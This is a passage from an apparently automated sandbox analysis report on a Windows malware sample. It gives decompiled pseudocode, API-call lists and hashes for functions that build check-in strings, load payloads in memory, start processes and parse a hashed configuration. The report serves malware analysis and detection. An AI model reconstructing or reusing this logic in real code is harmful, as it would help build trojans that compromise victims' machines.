				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t30;
				intOrPtr _t31;
				int _t34;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t51;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t65;
				intOrPtr _t68;
				intOrPtr _t71;
				int _t74;
				void* _t76;
				void* _t80;
				intOrPtr _t81;
				long _t83;
				intOrPtr* _t84;
				intOrPtr* _t85;
				int _t86;
				void* _t87;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_t80 = __edx;
				_t22 = __eax;
				_t90 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t22 = GetTickCount();
				}
				_t23 =  *0xd9d018; // 0x97601b6c
				asm("bswap eax");
				_t24 =  *0xd9d014; // 0x3a87c8cd
				asm("bswap eax");
				_t25 =  *0xd9d010; // 0xd8d2f808
				asm("bswap eax");
				_t26 =  *0xd9d00c; // 0x13d015ef
				asm("bswap eax");
				_t27 =  *0xd9d2a4; // 0x3e3a5a8
				_t3 = _t27 + 0xd9e633; // 0x74666f73
				_t86 = wsprintfA(_t90, _t3, 2, 0x3d132, _t26, _t25, _t24, _t23,  *0xd9d02c,  *0xd9d004, _t22);
				_t30 = E00D98616();
				_t31 =  *0xd9d2a4; // 0x3e3a5a8
				_t4 = _t31 + 0xd9e673; // 0x74707526
				_t34 = wsprintfA(_t86 + _t90, _t4, _t30);
				_t81 =  *0xd9d324; // 0x4bd95b0
				_t87 = _t86 + _t34;
				_t93 = _t91 + 0x38;
				_a32 = E00D966DB(0xd9d00a, _t81 + 4);
				_t37 =  *0xd9d2cc; // 0x0
				_t83 = 0;
				if(_t37 != 0) {
					_t71 =  *0xd9d2a4; // 0x3e3a5a8
					_t7 = _t71 + 0xd9e8ad; // 0x3d736f26
					_t74 = wsprintfA(_t87 + _t90, _t7, _t37);
					_t93 = _t93 + 0xc;
					_t87 = _t87 + _t74;
				}
				_t38 =  *0xd9d2c8; // 0x0
				if(_t38 != _t83) {
					_t68 =  *0xd9d2a4; // 0x3e3a5a8
					_t9 = _t68 + 0xd9e8a6; // 0x3d706926
					wsprintfA(_t87 + _t90, _t9, _t38);
				}
				if(_a32 != _t83) {
					_t76 = RtlAllocateHeap( *0xd9d238, _t83, 0x800);
					if(_t76 != _t83) {
						E00D959B0(GetTickCount());
						_t45 =  *0xd9d324; // 0x4bd95b0
						__imp__(_t45 + 0x40);
						asm("lock xadd [eax], ecx");
						_t49 =  *0xd9d324; // 0x4bd95b0
						__imp__(_t49 + 0x40);
						_t51 =  *0xd9d324; // 0x4bd95b0
						_t88 = E00D969CF(1, _t80, _t90,  *_t51);
						asm("lock xadd [eax], ecx");
						if(_t88 != _t83) {
							StrTrimA(_t88, 0xd9c294);
							_t57 =  *0xd9d2a4; // 0x3e3a5a8
							_push(_t88);
							_t11 = _t57 + 0xd9e252; // 0x616d692f
							_t59 = E00D95FD1(_t11);
							_v20 = _t59;
							if(_t59 != _t83) {
								_t84 = __imp__;
								 *_t84(_t88, _v4);
								 *_t84(_t76, _v0);
								_t85 = __imp__;
								 *_t85(_t76, _v32);
								 *_t85(_t76, _t88);
								_t65 = E00D9515C(0xffffffffffffffff, _t76, _v32, _v28);
								_v56 = _t65;
								if(_t65 != 0 && _t65 != 0x10d2) {
									E00D95225();
								}
								HeapFree( *0xd9d238, 0, _v48);
								_t83 = 0;
							}
							HeapFree( *0xd9d238, _t83, _t88);
						}
						HeapFree( *0xd9d238, _t83, _t76);
					}
					HeapFree( *0xd9d238, _t83, _a24);
				}
				HeapFree( *0xd9d238, _t83, _t90);
				return _a12;
			}

0x00d987b0
0x00d987b0
0x00d987b5
0x00d987bb
0x00d987c5
0x00d987c7
0x00d987c7
0x00d987d4
0x00d987df
0x00d987e2
0x00d987ed
0x00d987f0
0x00d987f5
0x00d987f8
0x00d987fd
0x00d98800
0x00d9880c
0x00d98819
0x00d9881b
0x00d98821
0x00d98826
0x00d98831
0x00d98833
0x00d98839
0x00d9883b
0x00d9884b
0x00d9884f
0x00d98854
0x00d98858
0x00d9885b
0x00d98860
0x00d9886b
0x00d9886d
0x00d98870
0x00d98870
0x00d98872
0x00d98879
0x00d9887c
0x00d98881
0x00d9888b
0x00d9888d
0x00d98894
0x00d988ac
0x00d988b0
0x00d988bc
0x00d988c1
0x00d988ca
0x00d988db
0x00d988df
0x00d988e8
0x00d988ee
0x00d988fb
0x00d98908
0x00d9890e
0x00d9891a
0x00d98920
0x00d98925
0x00d98926
0x00d9892d
0x00d98932
0x00d98938
0x00d9893e
0x00d98945
0x00d9894c
0x00d98952
0x00d98959
0x00d9895d
0x00d98968
0x00d9896d
0x00d98973
0x00d9897c
0x00d9897c
0x00d9898d
0x00d98993
0x00d98993
0x00d9899d
0x00d9899d
0x00d989ab
0x00d989ab
0x00d989bc
0x00d989bc
0x00d989ca
0x00d989db

APIs

GetTickCount.KERNEL32 ref: 00D987C7
wsprintfA.USER32 ref: 00D98814
wsprintfA.USER32 ref: 00D98831
wsprintfA.USER32 ref: 00D9886B
wsprintfA.USER32 ref: 00D9888B
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00D988A6
GetTickCount.KERNEL32 ref: 00D988B6
RtlEnterCriticalSection.NTDLL(04BD9570), ref: 00D988CA
RtlLeaveCriticalSection.NTDLL(04BD9570), ref: 00D988E8
StrTrimA.SHLWAPI(00000000,00D9C294,?,04BD95B0), ref: 00D9891A

Part of subcall function 00D95FD1: lstrlen.KERNEL32(00D98932,00000000,00000000,00D98932,616D692F,00000000), ref: 00D95FDD
Part of subcall function 00D95FD1: lstrlen.KERNEL32(?), ref: 00D95FE5
Part of subcall function 00D95FD1: lstrcpy.KERNEL32(00000000,?), ref: 00D95FFC
Part of subcall function 00D95FD1: lstrcat.KERNEL32(00000000,?), ref: 00D96007

lstrcpy.KERNEL32(00000000,?), ref: 00D98945
lstrcpy.KERNEL32(00000000,?), ref: 00D9894C
lstrcat.KERNEL32(00000000,?), ref: 00D98959
lstrcat.KERNEL32(00000000,00000000), ref: 00D9895D

Part of subcall function 00D9515C: WaitForSingleObject.KERNEL32(00000000,747C81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D9520E

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00D9898D
HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 00D9899D
HeapFree.KERNEL32(00000000,00000000,?,04BD95B0), ref: 00D989AB
HeapFree.KERNEL32(00000000,?), ref: 00D989BC
HeapFree.KERNEL32(00000000,?), ref: 00D989CA

Strings

Uxt, xrefs: 00D9898D, 00D9899D, 00D989AB, 00D989BC, 00D989CA

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrcpy$CountCriticalSectionTicklstrlen$AllocateEnterLeaveObjectSingleTrimWait
String ID: Uxt
API String ID: 3800513375-1536154274
Opcode ID: 316db97764e63d9ca6041d59b61c10cfde78fa3d7a94646f0e9060d0de5ea1a4
Instruction ID: 1197208141a7a01de6239f4d3f14cdaf06c80e9457015f25d3008f9f7d979752
Opcode Fuzzy Hash: 316db97764e63d9ca6041d59b61c10cfde78fa3d7a94646f0e9060d0de5ea1a4
Instruction Fuzzy Hash: 84517B71500300AFCB11EBA8EC88E5ABBEAEB89710B090516F50DD7335DB35D906DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00D9ABB5, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00D9ABB5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0xd90000;
				_t115 = _t139[3] + 0xd90000;
				_t131 = _t139[4] + 0xd90000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0xd90000;
				_v16 = _t139[5] + 0xd90000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0xd90002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0xd9d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0xd9d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0xd9d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0xd9d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0xd9d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0xd9d198; // 0x0
										 *_t102 = _t125;
										 *0xd9d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0xd9d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x00d9abc4
0x00d9abda
0x00d9abe0
0x00d9abe2
0x00d9abe7
0x00d9abed
0x00d9abf2
0x00d9abf5
0x00d9ac03
0x00d9ac0a
0x00d9ac0d
0x00d9ac10
0x00d9ac11
0x00d9ac14
0x00d9ac17
0x00d9ac1a
0x00d9ac1f
0x00d9ac2e
0x00000000
0x00d9ac34
0x00d9ac3e
0x00d9ac48
0x00d9ac4d
0x00d9ac4f
0x00d9ac59
0x00d9ac5c
0x00d9ac5f
0x00d9ac65
0x00d9ac67
0x00d9ac67
0x00d9ac6a
0x00d9ac6d
0x00d9ac72
0x00d9ac76
0x00d9ac89
0x00d9ac8b
0x00d9ad33
0x00d9ad33
0x00d9ad3a
0x00d9ad3d
0x00d9ad47
0x00d9ad47
0x00d9ad4b
0x00d9adc9
0x00d9adcc
0x00d9adce
0x00d9adce
0x00d9add5
0x00d9add7
0x00d9ade1
0x00d9ade4
0x00d9ade7
0x00d9ade7
0x00000000
0x00d9ad4d
0x00d9ad50
0x00d9ad7e
0x00d9ad88
0x00d9ad8c
0x00d9ad94
0x00d9ad97
0x00d9ad9e
0x00d9ada8
0x00d9ada8
0x00d9adac
0x00d9adb1
0x00d9adc0
0x00d9adc6
0x00d9adc6
0x00d9adac
0x00000000
0x00d9ad57
0x00d9ad5a
0x00d9ad62
0x00d9ad77
0x00d9ad7c
0x00000000
0x00000000
0x00d9ad7c
0x00000000
0x00d9ad62
0x00d9ad50
0x00d9ad4b
0x00d9ac91
0x00d9ac98
0x00d9aca8
0x00d9acb1
0x00d9acb5
0x00d9acf8
0x00d9ad04
0x00d9ad2d
0x00d9ad06
0x00d9ad0a
0x00d9ad10
0x00d9ad18
0x00d9ad1a
0x00d9ad1d
0x00d9ad23
0x00d9ad25
0x00d9ad25
0x00d9ad18
0x00d9ad0a
0x00000000
0x00d9ad04
0x00d9acbd
0x00d9acc0
0x00d9acc7
0x00d9acd7
0x00d9acda
0x00d9acea
0x00000000
0x00d9acf0
0x00d9acd1
0x00d9acd5
0x00000000
0x00000000
0x00000000
0x00d9acd5
0x00d9aca2
0x00d9aca6
0x00000000
0x00000000
0x00000000
0x00d9aca6
0x00d9ac7f
0x00d9ac83
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D9AC2E
LoadLibraryA.KERNEL32(?), ref: 00D9ACAB
GetLastError.KERNEL32 ref: 00D9ACB7
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00D9ACEA

Strings

Nxt, xrefs: 00D9AD82
$, xrefs: 00D9AC03

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $$Nxt
API String ID: 948315288-1945888910
Opcode ID: 70260a171a5f71de7ab64fd5b23efc2a6b55757fd57727810f1d6ebedb6dc0b3
Instruction ID: 85d58cd7c62de0912263612c2111b5f2c328bec98f6340d358da3633c94f03cc
Opcode Fuzzy Hash: 70260a171a5f71de7ab64fd5b23efc2a6b55757fd57727810f1d6ebedb6dc0b3
Instruction Fuzzy Hash: 73812976A00705AFDF10CFA9D984AADB7F5AF48311F15802AE909E7350EB70E945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D949B7, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00D949B7(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E00D914E7(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0xd9d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0xd9d2a4; // 0x3e3a5a8
					_t18 = _t46 + 0xd9e3e6; // 0x73797325
					_t66 = E00D967CF(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0xd9d2a4; // 0x3e3a5a8
						_t19 = _t49 + 0xd9e747; // 0x4bd8cef
						_t20 = _t49 + 0xd9e0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00D93D1E();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00D93D1E();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xd9d238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E00D945B3(_t68);
				goto L12;
			}

0x00d949bf
0x00d949bf
0x00d949ce
0x00d949d5
0x00d949da
0x00d94aea
0x00d94af1
0x00d94af1
0x00d949e9
0x00d949f4
0x00d949f7
0x00d949fc
0x00d94a11
0x00d94a17
0x00d94a18
0x00d94a1b
0x00d94a21
0x00d94a24
0x00d94a29
0x00d94a31
0x00d94a3d
0x00d94a41
0x00d94ad1
0x00d94a47
0x00d94a47
0x00d94a4c
0x00d94a53
0x00d94a67
0x00d94a6b
0x00d94aba
0x00d94a6d
0x00d94a6e
0x00d94a75
0x00d94a8e
0x00d94a90
0x00d94a94
0x00d94a9b
0x00d94ab5
0x00d94a9d
0x00d94aa6
0x00d94aab
0x00d94aab
0x00d94a9b
0x00d94ac9
0x00d94ac9
0x00d94a41
0x00d94ad8
0x00d94ae1
0x00d94ae5
0x00000000

APIs

Part of subcall function 00D914E7: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00D949D3,?,?,?,?,00000000,00000000), ref: 00D9150C
Part of subcall function 00D914E7: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00D9152E
Part of subcall function 00D914E7: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00D91544
Part of subcall function 00D914E7: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00D9155A
Part of subcall function 00D914E7: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00D91570
Part of subcall function 00D914E7: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00D91586

memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 00D949E9
memset.NTDLL ref: 00D94A24

Part of subcall function 00D967CF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,00D952BB,73797325), ref: 00D967E0
Part of subcall function 00D967CF: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00D967FA

GetModuleHandleA.KERNEL32(4E52454B,04BD8CEF,73797325), ref: 00D94A5A
GetProcAddress.KERNEL32(00000000), ref: 00D94A61
HeapFree.KERNEL32(00000000,00000000), ref: 00D94AC9

Part of subcall function 00D93D1E: GetProcAddress.KERNEL32(36776F57,00D94521), ref: 00D93D39

CloseHandle.KERNEL32(00000000,00000001), ref: 00D94AA6
CloseHandle.KERNEL32(?), ref: 00D94AAB
GetLastError.KERNEL32(00000001), ref: 00D94AAF

Strings

Uxt, xrefs: 00D94AC9
Nxt, xrefs: 00D94A61

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
String ID: Uxt$Nxt
API String ID: 478747673-3131234011
Opcode ID: 938ff141955d3307f623c8273b53bef627d0fb11822d6a5447f9355ac4dc1724
Instruction ID: f5b2d167fe5f3ff64b3ce86a3fb5c137d58a446ef7d1b809ec4db2fd8b4f2ce7
Opcode Fuzzy Hash: 938ff141955d3307f623c8273b53bef627d0fb11822d6a5447f9355ac4dc1724
Instruction Fuzzy Hash: 77312CB6800208BFDF10AFE4DD89D9EBBB9EB08304F150566E606E7221D6359E498B70

Uniqueness

Uniqueness Score: -1.00%

Function 00D94118, Relevance: 15.1, APIs: 10, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00D94118(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0xd9d33c; // 0x4bd9bb8
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E00D9222E(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0xd9c19c;
				}
				_t44 = E00D95E8C(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E00D96D10(lstrlenW(0xd9eb08) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xd9eb08) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0xd9d2a4; // 0x3e3a5a8
						_t73 =  *0xd9d11c; // 0xd9a9d7
						_t18 = _t75 + 0xd9eb08; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E00D96D10(lstrlenW(0xd9ec28) + _a8 + _t57 + _t58 + lstrlenW(0xd9ec28) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E00D945B3(_v16);
						} else {
							_t64 =  *0xd9d2a4; // 0x3e3a5a8
							_t31 = _t64 + 0xd9ec28; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E00D945B3(_v8);
				}
				return _v20;
			}

0x00d94118
0x00d94120
0x00d94126
0x00d94136
0x00d94139
0x00d9413e
0x00d94143
0x00d94145
0x00d94145
0x00d9414e
0x00d94153
0x00d94158
0x00d9415e
0x00d94168
0x00d94171
0x00d94178
0x00d94186
0x00d94198
0x00d9419d
0x00d941a2
0x00d941ab
0x00d941b4
0x00d941bd
0x00d941cb
0x00d941d3
0x00d941d8
0x00d941db
0x00d941e6
0x00d941fd
0x00d94201
0x00d94234
0x00d94203
0x00d94206
0x00d9420e
0x00d94219
0x00d94221
0x00d94229
0x00d9422d
0x00d9422d
0x00d94201
0x00d9423c
0x00d94241
0x00d94248

APIs

GetTickCount.KERNEL32 ref: 00D9412D
lstrlen.KERNEL32(00000000,80000002), ref: 00D94168
lstrlen.KERNEL32(?), ref: 00D94171
lstrlen.KERNEL32(00000000), ref: 00D94178
lstrlenW.KERNEL32(80000002), ref: 00D94186
lstrlenW.KERNEL32(00D9EB08), ref: 00D9418F
lstrlen.KERNEL32(?), ref: 00D941D3
lstrlen.KERNEL32(?), ref: 00D941DB
lstrlenW.KERNEL32(?), ref: 00D941E6
lstrlenW.KERNEL32(00D9EC28), ref: 00D941EF

Part of subcall function 00D945B3: HeapFree.KERNEL32(00000000,00000000,00D95DE9,00000000,?,?,-00000008), ref: 00D945BF

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 9240b98f34f3a587deb7d6153cb5bdb5c5e2e7901aef3ad245eff1a402b4a957
Instruction ID: b39552f0e8a0d466b6189b8bbe8d86a8c214013f0e76519709b9667dbeef4636
Opcode Fuzzy Hash: 9240b98f34f3a587deb7d6153cb5bdb5c5e2e7901aef3ad245eff1a402b4a957
Instruction Fuzzy Hash: 4E313676900209BFCF01AFA4DC4589EBBB5FF48354B054466F904AB222DB31EA15DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D9A22C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00D9A22C(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				signed int _t18;
				signed int _t23;
				void* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t41;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				signed int _t58;
				signed int _t62;
				signed int _t66;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t80 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0xd9d2a0; // 0x59935a40
				if(E00D91CEF( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0xd9d2d0 = _v12;
				}
				_t23 =  *0xd9d2a0; // 0x59935a40
				if(E00D91CEF( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_t28 = 2;
					return _t28;
				} else {
					_push(_t69);
					_t70 = _v12;
					_push(_t83);
					_push(_t80);
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t66 =  *0xd9d2a0; // 0x59935a40
						_t29 = E00D93D4D(_t72, _t70, _t66 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0xd9d240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t62 =  *0xd9d2a0; // 0x59935a40
						_t30 = E00D93D4D(_t72, _t70, _t62 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0xd9d244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t58 =  *0xd9d2a0; // 0x59935a40
						_t31 = E00D93D4D(_t72, _t70, _t58 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xd9d248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t54 =  *0xd9d2a0; // 0x59935a40
						_t32 = E00D93D4D(_t72, _t70, _t54 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xd9d004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t50 =  *0xd9d2a0; // 0x59935a40
						_t33 = E00D93D4D(_t72, _t70, _t50 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xd9d02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t46 =  *0xd9d2a0; // 0x59935a40
						_t34 = E00D93D4D(_t72, _t70, _t46 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t43 = 0x10;
						_t44 = E00D96555(_t43);
						if(_t44 != 0) {
							_push(_t44);
							E00D96B92();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t41 =  *0xd9d2a0; // 0x59935a40
